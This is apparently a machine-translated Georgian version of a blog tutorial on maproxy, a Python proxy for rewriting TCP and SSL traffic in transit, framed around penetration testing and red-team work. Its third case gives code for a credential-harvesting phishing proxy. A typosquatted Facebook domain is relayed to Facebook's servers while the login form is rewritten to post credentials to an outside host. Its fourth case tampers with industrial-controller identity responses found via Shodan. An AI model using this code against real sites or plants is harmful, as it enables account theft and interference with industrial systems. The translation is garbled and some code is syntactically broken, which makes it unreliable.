ქსელის მონაცემების დამუშავება ფრენისას

სტატიის თარგმანი მომზადდა კურსის დაწყების წინა დღეს „პენტესტი. შეღწევადობის ტესტირების პრაქტიკა".

რეზიუმე

სხვადასხვა ტიპის უსაფრთხოების შეფასებები, დაწყებული რეგულარული შეღწევადობის ტესტირებიდან და Red Team ოპერაციებიდან IoT/ICS მოწყობილობების და SCADA-ს ჰაკერებამდე, მოიცავს ორობითი ქსელის პროტოკოლებთან მუშაობას, ანუ არსებითად ქსელის მონაცემების ჩარევას და შეცვლას კლიენტსა და სამიზნეს შორის. ქსელის ტრაფიკის ამოცნობა არ არის რთული ამოცანა, რადგან ჩვენ გვაქვს ინსტრუმენტები, როგორიცაა Wireshark, Tcpdump ან Scapy, მაგრამ მოდიფიკაცია, როგორც ჩანს, უფრო შრომატევადი ამოცანაა, რადგან ჩვენ დაგვჭირდება რაიმე სახის ინტერფეისი ქსელის მონაცემების წასაკითხად, გასაფილტრად, შესაცვლელად. ის ფრენის დროს და გაუგზავნეთ სამიზნე მასპინძელს თითქმის რეალურ დროში. გარდა ამისა, იდეალური იქნებოდა, თუ ასეთი ხელსაწყო ავტომატურად იმუშავებს მრავალ პარალელურ კავშირთან და შეიძლება დააკონფიგურიროთ სკრიპტების გამოყენებით.

ერთ დღეს აღმოვაჩინე ინსტრუმენტი ე.წ maproxy, დოკუმენტაციამ სწრაფად ამიხსნა, რომ maproxy - მხოლოდ ის, რაც მჭირდება. ეს არის საკმაოდ მარტივი, მრავალმხრივი და ადვილად კონფიგურირებადი TCP პროქსი. მე გამოვცადე ეს ინსტრუმენტი რამდენიმე საკმაოდ რთულ აპლიკაციაზე, მათ შორის ICS მოწყობილობებზე (რომლებიც ქმნიან უამრავ პაკეტს), რათა დამენახა, შეეძლო თუ არა მას მრავალი პარალელური კავშირის დამუშავება და ინსტრუმენტი კარგად მუშაობდა.

ეს სტატია გაგაცნობთ ქსელის მონაცემების დამუშავებას ფრენის გამოყენებით maproxy.

განიხილოს

Tool maproxy დაფუძნებულია Tornado-ზე, პოპულარულ და სექსუალურ ასინქრონულ ქსელურ ჩარჩოზე Python-ში.

ზოგადად, მას შეუძლია მუშაობა რამდენიმე რეჟიმში:

• TCP:TCP - დაუშიფრავი TCP კავშირები;
• TCP:SSL и SSL:TCP – ცალმხრივი დაშიფვრით;
• SSL:SSL - ორმხრივი დაშიფვრა.

ის მოდის როგორც ბიბლიოთეკა. სწრაფი დაწყებისთვის, შეგიძლიათ გამოიყენოთ ფაილების მაგალითი, რომლებიც ასახავს მთავარს ბიბლიოთეკის ფუნქციები:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

შემთხვევა 1 – მარტივი ორმხრივი პროქსი

Დაფუძნებული tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

სტანდარტულად ProxyServer() იღებს ორ არგუმენტს - კავშირის ადგილმდებარეობას და სამიზნე პორტს. server.listen() იღებს ერთ არგუმენტს - პორტს შემომავალი კავშირის მოსასმენად.

სკრიპტის შესრულება:

# python tcp2tcp.py

ტესტის გასაშვებად, ჩვენ ვაპირებთ დავუკავშირდეთ ადგილობრივ SSH სერვერს ჩვენი პროქსი სკრიპტის მეშვეობით, რომელიც უსმენს 2222/tcp პორტი და უკავშირდება სტანდარტულ პორტს 22/tcp SSH სერვერები:

მისასალმებელი ბანერი გაცნობებთ, რომ ჩვენი მაგალითის სკრიპტმა წარმატებით მოახდინა ქსელის ტრაფიკის პროქსი.

შემთხვევა 2 – მონაცემთა მოდიფიკაცია

კიდევ ერთი დემო სკრიპტი logging_proxy.py იდეალურია ქსელის მონაცემებთან ურთიერთობისთვის. ფაილში მოცემული კომენტარები აღწერს კლასის მეთოდებს, რომლებიც შეგიძლიათ შეცვალოთ თქვენი მიზნის მისაღწევად:

ყველაზე საინტერესო აქ არის:

• on_c2p_done_read – კლიენტიდან სერვერამდე მიმავალ გზაზე მონაცემების ჩარევა;
• on_p2s_done_read - შებრუნდა.

მოდით ვცადოთ SSH ბანერის შეცვლა, რომელსაც სერვერი უბრუნებს კლიენტს:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

შეასრულეთ სკრიპტი:

როგორც ხედავთ, კლიენტი შეცდომაში შეიყვანეს, რადგან მისთვის SSH სერვერის სახელი შეიცვალა «DumnySSH».

შემთხვევა 3 – მარტივი ფიშინგის ვებ გვერდი

ამ ხელსაწყოს გამოყენების უსასრულო გზა არსებობს. ამჯერად, მოდით გავამახვილოთ ყურადღება რაღაც უფრო პრაქტიკულზე წითელი გუნდის ოპერაციების მხრიდან. მოდით მივბაძოთ სადესანტო გვერდს m.facebook.com და გამოიყენეთ მორგებული დომენი მიზანმიმართული ბეჭდვითი შეცდომით, მაგალითად, m.facebok.com. დემონსტრაციის მიზნით, დავუშვათ, რომ დომენი დარეგისტრირებულია ჩვენს მიერ.

ჩვენ ვაპირებთ დავამყაროთ დაშიფრული ქსელური კავშირი ჩვენი მსხვერპლის პროქსისთან და SSL Stream-თან Facebook სერვერთან (31.13.81.36). იმისთვის, რომ ეს მაგალითი იმუშაოს, ჩვენ უნდა შევცვალოთ HTTP ჰოსტის სათაური და შევიყვანოთ სწორი ჰოსტის სახელი, ასევე გავუქმებთ პასუხის შეკუმშვას, რათა ადვილად მივიღოთ შიგთავსზე. საბოლოო ჯამში, ჩვენ შევცვლით HTML ფორმას ისე, რომ შესვლის სერთიფიკატები გამოგვიგზავნეს Facebook-ის სერვერების ნაცვლად:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/ka/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

წლის შემაჯამებელი:

როგორც ხედავთ, ჩვენ წარმატებით შევძელით ორიგინალური საიტის შეცვლა.

შემთხვევა 4 – Ethernet/IP-ის პორტირება

საკმაოდ დიდი ხანია საქმე მაქვს სამრეწველო მოწყობილობებთან და პროგრამებთან (ICS/SCADA), როგორიცაა პროგრამირებადი კონტროლერები (PLC), I/O მოდულები, დისკები, რელეები, კიბეების პროგრამირების გარემო და მრავალი სხვა. ეს საქმე მათთვისაა, ვისაც სამრეწველო ნივთები უყვარს. ასეთი გადაწყვეტილებების გატეხვა გულისხმობს ქსელის პროტოკოლებთან აქტიურ თამაშს. შემდეგ მაგალითში მსურს გაჩვენოთ, თუ როგორ შეგიძლიათ შეცვალოთ ICS/SCADA ქსელის ტრაფიკი.

ამისთვის დაგჭირდებათ შემდეგი:

• ქსელის სნაიფერი, მაგალითად, Wireshark;
• Ethernet/IP ან უბრალოდ SIP მოწყობილობა, შეგიძლიათ იპოვოთ Shodan სერვისის გამოყენებით;
• ჩვენი სცენარი ეფუძნება maproxy.

პირველ რიგში, ვნახოთ, როგორ გამოიყურება ტიპიური საიდენტიფიკაციო პასუხი CIP-დან (საერთო სამრეწველო პროტოკოლი):

მოწყობილობის იდენტიფიკაცია ხორციელდება Ethernet/IP პროტოკოლის გამოყენებით, რომელიც წარმოადგენს სამრეწველო Ethernet პროტოკოლის გაძლიერებულ ვერსიას, რომელიც ახვევს საკონტროლო პროტოკოლებს, როგორიცაა CIP. ჩვენ ვაპირებთ შევცვალოთ მონიშნული ID სახელი, რომელიც ჩანს ეკრანის სურათზე "NI-IndComm Ethernet-ისთვის" ჩვენი პროქსი სკრიპტის გამოყენებით. ჩვენ შეგვიძლია სკრიპტის ხელახლა გამოყენება logging_proxy.py და ანალოგიურად შეცვალეთ კლასის მეთოდი on_p2s_done_read, რადგან გვსურს კლიენტზე ხილული იყოს სხვა პირადობის სახელი.

კოდი:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

არსებითად, ჩვენ ორჯერ ვითხოვეთ მოწყობილობის იდენტიფიკაცია, მეორე პასუხი იყო ორიგინალი და პირველი შეცვლილი იყო ფრენის დროს.

და ბოლო

Ჩემი აზრით maproxy მოსახერხებელი და მარტივი ინსტრუმენტი, რომელიც ასევე პითონშია დაწერილი, ასე რომ, მე მჯერა, რომ თქვენც შეგიძლიათ ისარგებლოთ მისი გამოყენებით. რა თქმა უნდა, არსებობს უფრო რთული ინსტრუმენტები ქსელის მონაცემების დამუშავებისა და მოდიფიცირებისთვის, მაგრამ ისინი ასევე საჭიროებენ მეტ ყურადღებას და ჩვეულებრივ იქმნება კონკრეტული გამოყენების შემთხვევისთვის, მაგ. მურაენა, მოდლიშკა ან evilginx მესამეს მსგავსი შემთხვევებისთვის ან კანაპე ბოლო შემთხვევისთვის. ასეა თუ ისე, დახმარებით maproxy თქვენ შეგიძლიათ სწრაფად განახორციელოთ თქვენი იდეები ქსელის მონაცემების გადასაჭრელად, რადგან მაგალითის სკრიპტები ძალიან მკაფიოა.

ავთენტიფიკაციის მექანიზმების ტესტირება Windows AD-ში

წყარო: www.habr.com